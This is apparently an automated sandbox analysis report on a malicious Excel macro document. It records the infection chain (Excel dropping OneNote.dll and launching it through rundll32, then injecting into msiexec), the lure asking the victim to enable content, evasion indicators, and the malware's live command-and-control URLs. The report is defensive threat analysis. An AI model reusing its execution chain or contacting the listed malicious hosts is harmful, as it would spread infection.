Play interactive tour

Edit tour

Analysis Report case (426).xls

Overview

General Information

Sample Name:	case (426).xls
Analysis ID:	343285
MD5:	b39a1365b5ba8cb5ed52942148636bf1
SHA1:	189509ee51aae87f21188cf75c1785207a92ec54
SHA256:	7847c9c6eae9fb7ca70174ed2092cd46f3d8b5c3172a980446aecf0d28961430
Tags:	excelv4macrovelvetsweatshop
Most interesting Screenshot:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Contains functionality to inject code into remote processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the product ID of Windows

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2304 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2408 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2336 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

msiexec.exe (PID: 1948 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2304, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer, ProcessId: 2408

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Source: 4.2.rundll32.exe.6e860000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 5.2.msiexec.exe.90000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 104.21.23.220:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.86.32:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.74:443 -> 192.168.2.22:49168 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\AskDie\FearWill\writeBrown\scoreFell\skill.pdb source: rundll32.exe, msiexec.exe, 00000005.00000003.2159243333.00000000009E0000.00000004.00000001.sdmp, xeda[1].dll.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\OneNote.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: xeda[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then add esi, 02h	4_2_6E87CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 00000000h	4_2_6E87DA70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 0000000Ah	4_2_6E86D830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	4_2_6E878830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 0000000Ah	5_2_0009D830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	5_2_000A8830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add esi, 02h	5_2_000ACE40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 00000000h	5_2_000ADA70

Source: global traffic

DNS query: name: fortnitehecks.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.21.23.220:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.21.23.220:443

Networking:

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_00091AF0 InternetReadFile,

5_2_00091AF0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: fortnitehecks.com

Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digice
Source: msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicep
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: msiexec.exe, 00000005.00000003.2164985906.0000000000835000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2155006192.0000000001E87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154347207.00000000022A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2155006192.0000000001E87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154347207.00000000022A7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: msiexec.exe, 00000005.00000002.2359491430.0000000002140000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2155006192.0000000001E87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154347207.00000000022A7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2155006192.0000000001E87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154347207.00000000022A7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: msiexec.exe, 00000005.00000002.2359491430.0000000002140000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: msiexec.exe, 00000005.00000003.2164985906.0000000000835000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2155006192.0000000001E87000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154347207.00000000022A7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: https://conssapratigdevi.tk/My
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: https://conssapratigdevi.tk/hy
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp, msiexec.exe, 00000005.00000002.2359298919.0000000000801000.00000004.00000020.sdmp	String found in binary or memory: https://conssapratigdevi.tk/post.php
Source: msiexec.exe, 00000005.00000002.2359298919.0000000000801000.00000004.00000020.sdmp	String found in binary or memory: https://conssapratigdevi.tk/post.phpad
Source: msiexec.exe, 00000005.00000002.2359339550.000000000084E000.00000004.00000020.sdmp	String found in binary or memory: https://forteanhub.com/
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp, msiexec.exe, 00000005.00000003.2164985906.0000000000835000.00000004.00000001.sdmp	String found in binary or memory: https://forteanhub.com/post.php
Source: msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	String found in binary or memory: https://groceryasian.com/
Source: msiexec.exe, 00000005.00000003.2162646677.0000000000846000.00000004.00000001.sdmp, msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	String found in binary or memory: https://groceryasian.com/post.php
Source: msiexec.exe, 00000005.00000002.2359260487.00000000007B9000.00000004.00000020.sdmp	String found in binary or memory: https://groceryasian.com/post.phpx6
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: msiexec.exe, 00000005.00000003.2164957158.0000000000801000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: msiexec.exe, 00000005.00000002.2359324397.0000000000835000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 104.21.23.220:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.209.71:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.86.32:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.152.74:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Content X I E27 -',- jR V A B C D E F G H I J K L M N O P Q R S T 1 ' Cjdigicert' 3

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\OneNote.dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E863A30	4_2_6E863A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E869A60	4_2_6E869A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E87DA70	4_2_6E87DA70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E875BF0	4_2_6E875BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E869C60	4_2_6E869C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00099C60	5_2_00099C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00093A30	5_2_00093A30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_00099A60	5_2_00099A60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000ADA70	5_2_000ADA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000A5BF0	5_2_000A5BF0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\OneNote.dll 5C0F9C9BABC640A2578B1D3E8CACB60DF32A0437EF3F9383D00ED88A7CEF3A62
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll 5C0F9C9BABC640A2578B1D3E8CACB60DF32A0437EF3F9383D00ED88A7CEF3A62

Source: mae.dll.5.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: rundll32.exe, 00000003.00000002.2154779683.0000000001CA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2154204525.00000000020C0000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal84.expl.evad.winXLS@7/12@5/4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 5_2_000A9C90 AdjustTokenPrivileges,

5_2_000A9C90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8769A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_6E8769A0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\73EE0000

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD73B.tmp

Jump to behavior

Source: case (426).xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\OneNote.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\AskDie\FearWill\writeBrown\scoreFell\skill.pdb source: rundll32.exe, msiexec.exe, 00000005.00000003.2159243333.00000000009E0000.00000004.00000001.sdmp, xeda[1].dll.0.dr

Source: case (426).xls

Initial sample: OLE indicators vbamacros = False

Source: case (426).xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E86D830 LoadLibraryA,GetProcAddress,

4_2_6E86D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E886E11 push cs; iretd	4_2_6E886E2D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E88A783 push ecx; iretd	4_2_6E88A79F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E886518 push ds; retf	4_2_6E88652C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E88D296 push cs; ret	4_2_6E88D2C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8899EE push esi; iretd	4_2_6E8899F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E88A1E0 push edi; retf	4_2_6E88A1E1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E88B16E push cs; iretd	4_2_6E88B18A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E8A6EAC push ds; iretd	4_2_6E8A6EAD

Source: initial sample

Static PE information: section name: .text entropy: 6.98571079162

Persistence and Installation Behavior:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\OneNote.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Ekduh\mae.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xeda[1].dll	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\OneNote.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_6E8769A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_6E8769A0

